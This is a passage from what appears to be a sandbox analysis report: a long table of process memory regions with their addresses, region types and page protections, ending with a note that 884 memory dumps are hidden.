|
page read and write
|
||
|
3282000
|
heap
|
page read and write
|
||
|
1DE9C370000
|
heap
|
page read and write
|
||
|
1E320AAB000
|
heap
|
page read and write
|
||
|
7FF5693ED000
|
unkown
|
page readonly
|
||
|
429000
|
unkown
|
page readonly
|
||
|
E10AAFE000
|
stack
|
page read and write
|
||
|
1DE9C6D0000
|
unkown
|
page readonly
|
||
|
DB950FF000
|
stack
|
page read and write
|
||
|
59FFEFE000
|
stack
|
page read and write
|
||
|
22163196000
|
heap
|
page read and write
|
||
|
18545AEC000
|
heap
|
page read and write
|
||
|
16591DA5000
|
heap
|
page read and write
|
||
|
1DBC74B7000
|
heap
|
page read and write
|
||
|
185405E0000
|
heap
|
page read and write
|
||
|
2E14D0D0000
|
unkown
|
page read and write
|
||
|
16591D97000
|
heap
|
page read and write
|
||
|
221611F5000
|
heap
|
page read and write
|
||
|
1DE9C429000
|
unkown
|
page read and write
|
||
|
1E320AB1000
|
heap
|
page read and write
|
||
|
1AEA6CC1000
|
heap
|
page read and write
|
||
|
22165A37000
|
heap
|
page read and write
|
||
|
149E000
|
heap
|
page read and write
|
||
|
2D5AC9ED000
|
heap
|
page read and write
|
||
|
7FF5694C6000
|
unkown
|
page readonly
|
||
|
2D5AC9EE000
|
heap
|
page read and write
|
||
|
221630C6000
|
heap
|
page read and write
|
||
|
2D5AADD5000
|
heap
|
page read and write
|
||
|
22160F40000
|
heap
|
page read and write
|
||
|
18541EA0000
|
direct allocation
|
page execute and read and write
|
||
|
2D5AC9E9000
|
heap
|
page read and write
|
||
|
7FF5693F9000
|
unkown
|
page readonly
|
||
|
22162EA1000
|
heap
|
page read and write
|
||
|
22E67AD3000
|
heap
|
page read and write
|
||
|
2E14B1A0000
|
heap
|
page read and write
|
||
|
1DBC91E0000
|
heap
|
page read and write
|
||
|
22E67B0F000
|
heap
|
page read and write
|
||
|
2D5ACA05000
|
heap
|
page read and write
|
||
|
7FF7A0A51000
|
unkown
|
page execute read
|
||
|
848367B000
|
stack
|
page read and write
|
||
|
58DCBFE000
|
stack
|
page read and write
|
||
|
1DE9C502000
|
unkown
|
page read and write
|
||
|
22160F82000
|
heap
|
page read and write
|
||
|
22E69490000
|
heap
|
page read and write
|
||
|
1DE9C444000
|
unkown
|
page read and write
|
||
|
1DE9C43B000
|
unkown
|
page read and write
|
||
|
1959AD05000
|
heap
|
page read and write
|
||
|
22165ABB000
|
heap
|
page read and write
|
||
|
1DBC7448000
|
heap
|
page read and write
|
||
|
7FF5694AE000
|
unkown
|
page readonly
|
||
|
22161047000
|
heap
|
page read and write
|
||
|
2D5ACB40000
|
heap
|
page read and write
|
||
|
7FF7A1172000
|
unkown
|
page execute read
|
||
|
1959ACF2000
|
heap
|
page read and write
|
||
|
22163163000
|
heap
|
page read and write
|
||
|
22162DA5000
|
heap
|
page read and write
|
||
|
848327B000
|
stack
|
page read and write
|
||
|
2D5AAB35000
|
heap
|
page read and write
|
||
|
EF0000
|
heap
|
page read and write
|
||
|
2D5AC86C000
|
heap
|
page read and write
|
||
|
58DD1FE000
|
stack
|
page read and write
|
||
|
1AEA8961000
|
heap
|
page read and write
|
||
|
1DBC748B000
|
heap
|
page read and write
|
||
|
7FF56942B000
|
unkown
|
page readonly
|
||
|
58DD3FE000
|
stack
|
page read and write
|
||
|
22162E5B000
|
heap
|
page read and write
|
||
|
22E67B0B000
|
heap
|
page read and write
|
||
|
1959ACA8000
|
heap
|
page read and write
|
||
|
221611C4000
|
heap
|
page read and write
|
||
|
22160F20000
|
heap
|
page read and write
|
||
|
1DBC7491000
|
heap
|
page read and write
|
||
|
16591DB6000
|
heap
|
page read and write
|
||
|
22165F73000
|
heap
|
page read and write
|
||
|
22160FAC000
|
heap
|
page read and write
|
||
|
18541EEC000
|
heap
|
page read and write
|
||
|
1490000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
22162F46000
|
heap
|
page read and write
|
||
|
1AEA6CCE000
|
heap
|
page read and write
|
||
|
18543CEC000
|
heap
|
page read and write
|
||
|
22165AFD000
|
heap
|
page read and write
|
||
|
2E14D2D0000
|
unkown
|
page readonly
|
||
|
22163161000
|
heap
|
page read and write
|
||
|
1FFE095B000
|
heap
|
page read and write
|
||
|
221633E0000
|
remote allocation
|
page read and write
|
||
|
1AEA6CD4000
|
heap
|
page read and write
|
||
|
58DD7FF000
|
stack
|
page read and write
|
||
|
22162E5B000
|
heap
|
page read and write
|
||
|
16591F80000
|
heap
|
page read and write
|
||
|
18540571000
|
heap
|
page read and write
|
||
|
174F000
|
stack
|
page read and write
|
||
|
144E000
|
stack
|
page read and write
|
||
|
1AEA8962000
|
heap
|
page read and write
|
||
|
2D5AAA20000
|
heap
|
page read and write
|
||
|
18540532000
|
heap
|
page read and write
|
||
|
2D5AAB40000
|
heap
|
page read and write
|
||
|
1959ACF3000
|
heap
|
page read and write
|
||
|
1AEA6CC7000
|
heap
|
page read and write
|
||
|
1E320A93000
|
heap
|
page read and write
|
||
|
58DD5FE000
|
stack
|
page read and write
|
||
|
1AEA6A90000
|
heap
|
page read and write
|
||
|
22162E60000
|
heap
|
page read and write
|
||
|
58DC3FF000
|
stack
|
page read and write
|
||
|
442000
|
unkown
|
page readonly
|
||
|
1959ACFA000
|
heap
|
page read and write
|
||
|
22E67B1E000
|
heap
|
page read and write
|
||
|
2D5AAB28000
|
heap
|
page read and write
|
||
|
E10A796000
|
stack
|
page read and write
|
||
|
1959ACCF000
|
heap
|
page read and write
|
||
|
2D5ACB40000
|
heap
|
page read and write
|
||
|
1AEA6CCD000
|
heap
|
page read and write
|
||
|
22163163000
|
heap
|
page read and write
|
||
|
7FF56941B000
|
unkown
|
page readonly
|
||
|
1DE9C300000
|
heap
|
page read and write
|
||
|
18540558000
|
heap
|
page read and write
|
||
|
1DE9C402000
|
unkown
|
page read and write
|
||
|
1FFE095A000
|
heap
|
page read and write
|
||
|
22162E60000
|
heap
|
page read and write
|
||
|
22162F9C000
|
heap
|
page read and write
|
||
|
E8FB8FF000
|
unkown
|
page read and write
|
||
|
2D5AC9EF000
|
heap
|
page read and write
|
||
|
22E67B20000
|
heap
|
page read and write
|
||
|
22162DAC000
|
heap
|
page read and write
|
||
|
30F0000
|
direct allocation
|
page read and write
|
||
|
2791BFE000
|
stack
|
page read and write
|
||
|
2D5AC850000
|
heap
|
page read and write
|
||
|
1E3228A7000
|
heap
|
page read and write
|
||
|
1DBC7380000
|
heap
|
page read and write
|
||
|
2E14B2B5000
|
unkown
|
page read and write
|
||
|
2D5AC9DA000
|
heap
|
page read and write
|
||
|
22165BA9000
|
heap
|
page read and write
|
||
|
16591DB0000
|
heap
|
page read and write
|
||
|
1DBC74BA000
|
heap
|
page read and write
|
||
|
7FF569425000
|
unkown
|
page readonly
|
||
|
22162F93000
|
heap
|
page read and write
|
||
|
2D5AC9EF000
|
heap
|
page read and write
|
||
|
22162DBC000
|
heap
|
page read and write
|
||
|
22160F7E000
|
heap
|
page read and write
|
||
|
58DD5FB000
|
stack
|
page read and write
|
||
|
1959ACA6000
|
heap
|
page read and write
|
||
|
1FFE25D7000
|
heap
|
page read and write
|
||
|
1E320A60000
|
heap
|
page read and write
|
||
|
66295FF000
|
stack
|
page read and write
|
||
|
22E67AD9000
|
heap
|
page read and write
|
||
|
16591D91000
|
heap
|
page read and write
|
||
|
FF61AFE000
|
stack
|
page read and write
|
||
|
1AEA6CCD000
|
heap
|
page read and write
|
||
|
22164950000
|
heap
|
page read and write
|
||
|
22163115000
|
heap
|
page read and write
|
||
|
2E14B160000
|
heap
|
page read and write
|
||
|
1460000
|
heap
|
page read and write
|
||
|
22162E65000
|
heap
|
page read and write
|
||
|
22162F3E000
|
heap
|
page read and write
|
||
|
22E67AA8000
|
heap
|
page read and write
|
||
|
16591DAE000
|
heap
|
page read and write
|
||
|
2E14B1A3000
|
heap
|
page read and write
|
||
|
765E3D9000
|
stack
|
page read and write
|
||
|
7FF5693DC000
|
unkown
|
page readonly
|
||
|
1DE9C300000
|
heap
|
page read and write
|
||
|
22E67ADB000
|
heap
|
page read and write
|
||
|
DB952FE000
|
stack
|
page read and write
|
||
|
22162F61000
|
heap
|
page read and write
|
||
|
22162FA1000
|
heap
|
page read and write
|
||
|
22165970000
|
heap
|
page read and write
|
||
|
1DBC74EB000
|
heap
|
page read and write
|
||
|
DB94DFE000
|
stack
|
page read and write
|
||
|
1E320A92000
|
heap
|
page read and write
|
||
|
1959ACFA000
|
heap
|
page read and write
|
||
|
1AEA6C60000
|
heap
|
page read and write
|
||
|
22163550000
|
heap
|
page read and write
|
||
|
59FF9FE000
|
stack
|
page read and write
|
||
|
1FFE0BB0000
|
heap
|
page read and write
|
||
|
1AEA6E4B000
|
heap
|
page read and write
|
||
|
FF620FF000
|
stack
|
page read and write
|
||
|
22162F2A000
|
heap
|
page read and write
|
||
|
2E14D290000
|
unkown
|
page read and write
|
||
|
7FF5693E6000
|
unkown
|
page readonly
|
||
|
22162DA1000
|
heap
|
page read and write
|
||
|
7FF5694C1000
|
unkown
|
page readonly
|
||
|
1E3208B0000
|
heap
|
page read and write
|
||
|
1AEA896F000
|
heap
|
page read and write
|
||
|
22165ABB000
|
heap
|
page read and write
|
||
|
22163072000
|
heap
|
page read and write
|
||
|
3A8FEFF000
|
stack
|
page read and write
|
||
|
1959AD0C000
|
heap
|
page read and write
|
||
|
27917FF000
|
stack
|
page read and write
|
||
|
16591D98000
|
heap
|
page read and write
|
||
|
1DE9C441000
|
unkown
|
page read and write
|
||
|
1E320AB3000
|
heap
|
page read and write
|
||
|
18541E52000
|
heap
|
page read and write
|
||
|
7FF569453000
|
unkown
|
page readonly
|
||
|
1DBC74BF000
|
heap
|
page read and write
|
||
|
7FF5693F9000
|
unkown
|
page readonly
|
||
|
1550000
|
heap
|
page read and write
|
||
|
1FFE0820000
|
heap
|
page read and write
|
||
|
22162E5A000
|
heap
|
page read and write
|
||
|
7FF5694CD000
|
unkown
|
page readonly
|
||
|
1FFE092D000
|
heap
|
page read and write
|
||
|
1959AD01000
|
heap
|
page read and write
|
||
|
16591DB0000
|
heap
|
page read and write
|
||
|
22E67B13000
|
heap
|
page read and write
|
||
|
2D5AC9F1000
|
heap
|
page read and write
|
||
|
22162DA9000
|
heap
|
page read and write
|
||
|
1E320A8A000
|
heap
|
page read and write
|
||
|
2D5AC85C000
|
heap
|
page read and write
|
||
|
22162F46000
|
heap
|
page read and write
|
||
|
58DCEFE000
|
stack
|
page read and write
|
||
|
165937E0000
|
heap
|
page read and write
|
||
|
58DCCFE000
|
stack
|
page read and write
|
||
|
22E67B3E000
|
heap
|
page read and write
|
||
|
F00000
|
heap
|
page read and write
|
||
|
1DBC7705000
|
heap
|
page read and write
|
||
|
16591DA3000
|
heap
|
page read and write
|
||
|
1AEA6C70000
|
heap
|
page read and write
|
||
|
18540578000
|
heap
|
page read and write
|
||
|
1E3228A0000
|
heap
|
page read and write
|
||
|
7FF5693F5000
|
unkown
|
page readonly
|
||
|
22E67AC7000
|
heap
|
page read and write
|
||
|
16591F20000
|
heap
|
page read and write
|
||
|
2D5AC904000
|
heap
|
page read and write
|
||
|
1DBC7468000
|
heap
|
page read and write
|
||
|
1DBC8DD0000
|
heap
|
page read and write
|
||
|
16591DA6000
|
heap
|
page read and write
|
||
|
1DBC7466000
|
heap
|
page read and write
|
||
|
1DBC7240000
|
heap
|
page read and write
|
||
|
16591DA6000
|
heap
|
page read and write
|
||
|
2216310C000
|
heap
|
page read and write
|
||
|
22162DC5000
|
heap
|
page read and write
|
||
|
E10B0FA000
|
stack
|
page read and write
|
||
|
16593BF0000
|
heap
|
page read and write
|
||
|
2D9CCFE000
|
stack
|
page read and write
|
||
|
1AEA8960000
|
heap
|
page read and write
|
||
|
E10B1FE000
|
stack
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
22162E69000
|
heap
|
page read and write
|
||
|
848327B000
|
stack
|
page read and write
|
||
|
2E14B1C8000
|
heap
|
page read and write
|
||
|
18541ED0000
|
heap
|
page read and write
|
||
|
1E320C00000
|
heap
|
page read and write
|
||
|
2D5AC851000
|
heap
|
page read and write
|
||
|
2D5AC90B000
|
heap
|
page read and write
|
||
|
18540470000
|
heap
|
page read and write
|
||
|
58DD2FF000
|
stack
|
page read and write
|
||
|
2D5AC90A000
|
heap
|
page read and write
|
||
|
221630C0000
|
heap
|
page read and write
|
||
|
22165BC3000
|
heap
|
page read and write
|
||
|
27919FF000
|
stack
|
page read and write
|
||
|
1E320AB1000
|
heap
|
page read and write
|
||
|
2D5AAB37000
|
heap
|
page read and write
|
||
|
58DCFFE000
|
stack
|
page read and write
|
||
|
1E320A68000
|
heap
|
page read and write
|
||
|
2D5AC852000
|
heap
|
page read and write
|
||
|
16591CC0000
|
heap
|
page read and write
|
||
|
22161035000
|
heap
|
page read and write
|
||
|
3A8FBFE000
|
stack
|
page read and write
|
||
|
18541DA0000
|
heap
|
page read and write
|
||
|
221630D2000
|
heap
|
page read and write
|
||
|
2D5AAA6F000
|
heap
|
page read and write
|
||
|
22E67AE9000
|
heap
|
page read and write
|
||
|
1AEA6CD2000
|
heap
|
page read and write
|
||
|
7FF569453000
|
unkown
|
page readonly
|
||
|
43A000
|
unkown
|
page write copy
|
||
|
3281000
|
heap
|
page read and write
|
||
|
16591DA1000
|
heap
|
page read and write
|
||
|
1558000
|
heap
|
page read and write
|
||
|
59FFDFE000
|
stack
|
page read and write
|
||
|
22165B3F000
|
heap
|
page read and write
|
||
|
DB951FE000
|
stack
|
page read and write
|
||
|
1DBC748A000
|
heap
|
page read and write
|
||
|
1E320AB2000
|
heap
|
page read and write
|
||
|
1DE9C402000
|
unkown
|
page read and write
|
||
|
1DBC7473000
|
heap
|
page read and write
|
||
|
22E67B2D000
|
heap
|
page read and write
|
||
|
1959AD4E000
|
heap
|
page read and write
|
||
|
1AEA6CD6000
|
heap
|
page read and write
|
||
|
22E67B23000
|
heap
|
page read and write
|
||
|
22163189000
|
heap
|
page read and write
|
||
|
DB94CFE000
|
stack
|
page read and write
|
||
|
7FF5693DC000
|
unkown
|
page readonly
|
||
|
2216311D000
|
heap
|
page read and write
|
||
|
1FFE0938000
|
heap
|
page read and write
|
||
|
221630D2000
|
heap
|
page read and write
|
||
|
3A901FE000
|
stack
|
page read and write
|
||
|
1959ACF3000
|
heap
|
page read and write
|
||
|
1959ABD0000
|
heap
|
page read and write
|
||
|
16593BF7000
|
heap
|
page read and write
|
||
|
1DBC74B8000
|
heap
|
page read and write
|
||
|
1E3209F0000
|
heap
|
page read and write
|
||
|
3300000
|
direct allocation
|
page read and write
|
||
|
1AEA6C98000
|
heap
|
page read and write
|
||
|
1AEA6C88000
|
heap
|
page read and write
|
||
|
2D5ACB34000
|
heap
|
page read and write
|
||
|
2D5AC907000
|
heap
|
page read and write
|
||
|
22162F77000
|
heap
|
page read and write
|
||
|
1AEA6CD1000
|
heap
|
page read and write
|
||
|
58DC6FF000
|
stack
|
page read and write
|
||
|
22162E56000
|
heap
|
page read and write
|
||
|
18540520000
|
heap
|
page read and write
|
||
|
221630BD000
|
heap
|
page read and write
|
||
|
22165470000
|
trusted library allocation
|
page read and write
|
||
|
2D9D0FF000
|
stack
|
page read and write
|
||
|
2D5AC861000
|
heap
|
page read and write
|
||
|
DB955FB000
|
stack
|
page read and write
|
||
|
22161051000
|
heap
|
page read and write
|
||
|
1959AD02000
|
heap
|
page read and write
|
||
|
1DBC74B8000
|
heap
|
page read and write
|
||
|
1AEA6C8D000
|
heap
|
page read and write
|
||
|
1FFE0BB5000
|
heap
|
page read and write
|
||
|
22161044000
|
heap
|
page read and write
|
||
|
185405F8000
|
heap
|
page read and write
|
||
|
1854057D000
|
heap
|
page read and write
|
||
|
18540531000
|
heap
|
page read and write
|
||
|
22161050000
|
heap
|
page read and write
|
||
|
1AEA896B000
|
heap
|
page read and write
|
||
|
22163161000
|
heap
|
page read and write
|
||
|
22162E58000
|
heap
|
page read and write
|
||
|
22165ABB000
|
heap
|
page read and write
|
||
|
1959ACF7000
|
heap
|
page read and write
|
||
|
1DE9C429000
|
unkown
|
page read and write
|
||
|
22E69650000
|
heap
|
page read and write
|
||
|
1DBC74C8000
|
heap
|
page read and write
|
||
|
2216311A000
|
heap
|
page read and write
|
||
|
59FFCFE000
|
stack
|
page read and write
|
||
|
2D5ACB36000
|
heap
|
page read and write
|
||
|
7FF569425000
|
unkown
|
page readonly
|
||
|
22162DA1000
|
heap
|
page read and write
|
||
|
18541E72000
|
heap
|
page read and write
|
||
|
1959AF15000
|
heap
|
page read and write
|
||
|
1E320A7E000
|
heap
|
page read and write
|
||
|
1959AD01000
|
heap
|
page read and write
|
||
|
1959AC92000
|
heap
|
page read and write
|
||
|
1FFE0800000
|
heap
|
page read and write
|
||
|
2D5AC86C000
|
heap
|
page read and write
|
||
|
7FF569418000
|
unkown
|
page readonly
|
||
|
1959ACAA000
|
heap
|
page read and write
|
||
|
18541E85000
|
heap
|
page read and write
|
||
|
1DE9C400000
|
unkown
|
page read and write
|
||
|
22E67B20000
|
heap
|
page read and write
|
||
|
1AEA896E000
|
heap
|
page read and write
|
||
|
58DCDFF000
|
stack
|
page read and write
|
||
|
18540542000
|
heap
|
page read and write
|
||
|
18541EB0000
|
direct allocation
|
page execute and read and write
|
||
|
22160F94000
|
heap
|
page read and write
|
||
|
27916FD000
|
stack
|
page read and write
|
||
|
1DBC748B000
|
heap
|
page read and write
|
||
|
2D5AAA9E000
|
heap
|
page read and write
|
||
|
1AEA6C78000
|
heap
|
page read and write
|
||
|
E10B3FE000
|
stack
|
page read and write
|
||
|
3B0000
|
unkown
|
page readonly
|
||
|
2216311D000
|
heap
|
page read and write
|
||
|
1FFE0928000
|
heap
|
page read and write
|
||
|
7FF569448000
|
unkown
|
page readonly
|
||
|
2D5AAB28000
|
heap
|
page read and write
|
||
|
1DE9C380000
|
unkown
|
page readonly
|
||
|
18541EA8000
|
direct allocation
|
page execute and read and write
|
||
|
1AEA6CC6000
|
heap
|
page read and write
|
||
|
2D5AAA89000
|
heap
|
page read and write
|
||
|
1959ACB4000
|
heap
|
page read and write
|
||
|
1FFE094B000
|
heap
|
page read and write
|
||
|
22162E54000
|
heap
|
page read and write
|
||
|
2E14B165000
|
heap
|
page read and write
|
||
|
221630A5000
|
heap
|
page read and write
|
||
|
1DBC7452000
|
heap
|
page read and write
|
||
|
848367B000
|
stack
|
page read and write
|
||
|
58DD0FF000
|
stack
|
page read and write
|
||
|
3A8FAF9000
|
stack
|
page read and write
|
||
|
22162F53000
|
heap
|
page read and write
|
||
|
185450EC000
|
heap
|
page read and write
|
||
|
2E14B650000
|
unkown
|
page readonly
|
||
|
1DBC91E3000
|
heap
|
page read and write
|
||
|
2D5AAA86000
|
heap
|
page read and write
|
||
|
59FFFFE000
|
stack
|
page read and write
|
||
|
1499000
|
heap
|
page read and write
|
||
|
16591DA1000
|
heap
|
page read and write
|
||
|
22163115000
|
heap
|
page read and write
|
||
|
7FF5693DA000
|
unkown
|
page readonly
|
||
|
2791AFF000
|
stack
|
page read and write
|
||
|
1E322550000
|
heap
|
page read and write
|
||
|
765EFFE000
|
stack
|
page read and write
|
||
|
22163115000
|
heap
|
page read and write
|
||
|
765E8FE000
|
stack
|
page read and write
|
||
|
22162F98000
|
heap
|
page read and write
|
||
|
22162DA2000
|
heap
|
page read and write
|
||
|
1959ACFE000
|
heap
|
page read and write
|
||
|
22162E58000
|
heap
|
page read and write
|
||
|
22162F5B000
|
heap
|
page read and write
|
||
|
18541EC0000
|
heap
|
page read and write
|
||
|
1DE9C502000
|
unkown
|
page read and write
|
||
|
2216307F000
|
heap
|
page read and write
|
||
|
22165AFE000
|
heap
|
page read and write
|
||
|
7FF5694C1000
|
unkown
|
page readonly
|
||
|
22162F2A000
|
heap
|
page read and write
|
||
|
22E67B3E000
|
heap
|
page read and write
|
||
|
59801FB000
|
stack
|
page read and write
|
||
|
1DBC74EB000
|
heap
|
page read and write
|
||
|
7FF569415000
|
unkown
|
page readonly
|
||
|
1FFE0918000
|
heap
|
page read and write
|
||
|
2D5AC9EA000
|
heap
|
page read and write
|
||
|
1DBC7474000
|
heap
|
page read and write
|
||
|
66294FF000
|
stack
|
page read and write
|
||
|
1959ACF4000
|
heap
|
page read and write
|
||
|
1FFE25D0000
|
heap
|
page read and write
|
||
|
1FFE094D000
|
heap
|
page read and write
|
||
|
1FFE0850000
|
heap
|
page read and write
|
||
|
3381000
|
heap
|
page read and write
|
||
|
58DD6FE000
|
stack
|
page read and write
|
||
|
E8FB70B000
|
unkown
|
page read and write
|
||
|
2216318E000
|
heap
|
page read and write
|
||
|
18540330000
|
heap
|
page read and write
|
||
|
2D5AC855000
|
heap
|
page read and write
|
||
|
58DC7FE000
|
stack
|
page read and write
|
||
|
2216311A000
|
heap
|
page read and write
|
||
|
221630D3000
|
heap
|
page read and write
|
||
|
848357F000
|
stack
|
page read and write
|
||
|
2D9CBFE000
|
stack
|
page read and write
|
||
|
66298FE000
|
stack
|
page read and write
|
||
|
1DBC74D7000
|
heap
|
page read and write
|
||
|
1959ACEF000
|
heap
|
page read and write
|
||
|
16591F00000
|
heap
|
page read and write
|
||
|
3A900FE000
|
stack
|
page read and write
|
||
|
22163072000
|
heap
|
page read and write
|
||
|
16591D38000
|
heap
|
page read and write
|
||
|
442000
|
unkown
|
page readonly
|
||
|
1854059D000
|
heap
|
page read and write
|
||
|
1959AF10000
|
heap
|
page read and write
|
||
|
16591DAE000
|
heap
|
page read and write
|
||
|
16591DAE000
|
heap
|
page read and write
|
||
|
22163490000
|
heap
|
page read and write
|
||
|
22163193000
|
heap
|
page read and write
|
||
|
1FFE06C0000
|
heap
|
page read and write
|
||
|
3242000
|
heap
|
page read and write
|
||
|
1DBC7508000
|
heap
|
page read and write
|
||
|
22163115000
|
heap
|
page read and write
|
||
|
22E67B13000
|
heap
|
page read and write
|
||
|
18541DE0000
|
heap
|
page read and write
|
||
|
22E67AC5000
|
heap
|
page read and write
|
||
|
2216310C000
|
heap
|
page read and write
|
||
|
22E67B2F000
|
heap
|
page read and write
|
||
|
1FFE093A000
|
heap
|
page read and write
|
||
|
3202000
|
heap
|
page read and write
|
||
|
18540500000
|
heap
|
page read and write
|
||
|
1DBC74D0000
|
heap
|
page read and write
|
||
|
22E67AEA000
|
heap
|
page read and write
|
||
|
185405F0000
|
heap
|
page read and write
|
||
|
22162F60000
|
heap
|
page read and write
|
||
|
1495000
|
heap
|
page read and write
|
||
|
F6C000
|
stack
|
page read and write
|
||
|
7FF569367000
|
unkown
|
page readonly
|
||
|
E8FB9FE000
|
unkown
|
page read and write
|
||
|
7FF5693ED000
|
unkown
|
page readonly
|
||
|
1FFE093A000
|
heap
|
page read and write
|
||
|
12FC000
|
stack
|
page read and write
|
||
|
1FFE094E000
|
heap
|
page read and write
|
||
|
22165979000
|
heap
|
page read and write
|
||
|
22162DC5000
|
heap
|
page read and write
|
||
|
22E67B0A000
|
heap
|
page read and write
|
||
|
1AEA6E45000
|
heap
|
page read and write
|
||
|
2216307D000
|
heap
|
page read and write
|
||
|
2216311A000
|
heap
|
page read and write
|
||
|
16591DA9000
|
heap
|
page read and write
|
||
|
1DBC74CB000
|
heap
|
page read and write
|
||
|
7FF5694C6000
|
unkown
|
page readonly
|
||
|
22162DA0000
|
heap
|
page read and write
|
||
|
1FFE0943000
|
heap
|
page read and write
|
||
|
1FFE092D000
|
heap
|
page read and write
|
||
|
22165B3F000
|
heap
|
page read and write
|
||
|
1AEA6CB0000
|
heap
|
page read and write
|
||
|
1959AD03000
|
heap
|
page read and write
|
||
|
1DBC7440000
|
heap
|
page read and write
|
||
|
18541E02000
|
heap
|
page read and write
|
||
|
2D5AA990000
|
heap
|
page read and write
|
||
|
18541ED5000
|
heap
|
page read and write
|
||
|
1959AD03000
|
heap
|
page read and write
|
||
|
16591D97000
|
heap
|
page read and write
|
||
|
22163163000
|
heap
|
page read and write
|
||
|
16591DA3000
|
heap
|
page read and write
|
||
|
22161045000
|
heap
|
page read and write
|
There are 884 hidden memdumps, click here to show them.